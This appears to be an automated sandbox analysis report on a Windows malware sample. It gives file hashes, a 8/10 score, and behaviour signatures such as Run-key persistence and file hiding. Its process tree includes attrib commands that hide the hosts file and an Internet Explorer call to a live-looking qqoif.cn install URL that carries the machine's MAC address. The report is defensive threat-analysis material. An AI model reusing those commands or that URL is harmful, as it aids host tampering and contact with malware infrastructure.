Overview

overview

8

Static

static

3

8be7124a12...18.exe

windows7-x64

8

8be7124a12...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/08/2024, 20:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe

  • Size

    503KB

  • MD5

    8be7124a1256617766fcc2fa45f3190b

  • SHA1

    3825ab8ee89b8bbfc17429ffee2c55ca6d9f9fe9

  • SHA256

    4ea704d6b372cfe702c23aa22a53203dccc51fe2dd5a39c072c05b51f48a8a31

  • SHA512

    33d5786b0743c0017525a8130428d87a70423658067cb7bdca0841de1126eb2d644dc1409bb3ffe59a4176074d0b560a4516cf5f7933279ea683bf70668834aa

  • SSDEEP

    12288:yBzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz6:Azzzzzzzzzzzzzzzzzzzzzzzzzzzzzzm

Score
8/10
discoveryevasionpersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3412
      • C:\Users\Admin\AppData\Local\Temp\8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\8be7124a1256617766fcc2fa45f3190b_JaffaCakes118.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:320
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:4340
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.qqoif.cn/vip/install.asp?ver=081211&tgid=yun10&address=F6-0A-6D-D2-E8-28&regk=1&flag=7bcdc490eabb9c9ee65e4414f903dc02&frandom=5267"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4400
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4400 CREDAT:17410 /prefetch:2
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2996
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4f8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1092

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\~DF4E8E65E43FD74121.TMP
      Filesize

      16KB

      MD5

      0a0a8043b43b2e8915423ea7cefe66b1

      SHA1

      8192a20712ad334a7d55f7964e421f506052d24b

      SHA256

      5bc466a368b022ec32466a573a99cc40ee74087a139e1f49b78bce829583591d

      SHA512

      71a57d55799c3b52652d3d78280424c0d62d6643dcc987554b71785cf2a1856dde04638968cc38a48c7f0fef54ca49ee231f182fd558803016a216a7fb7ac99f

      Download Submit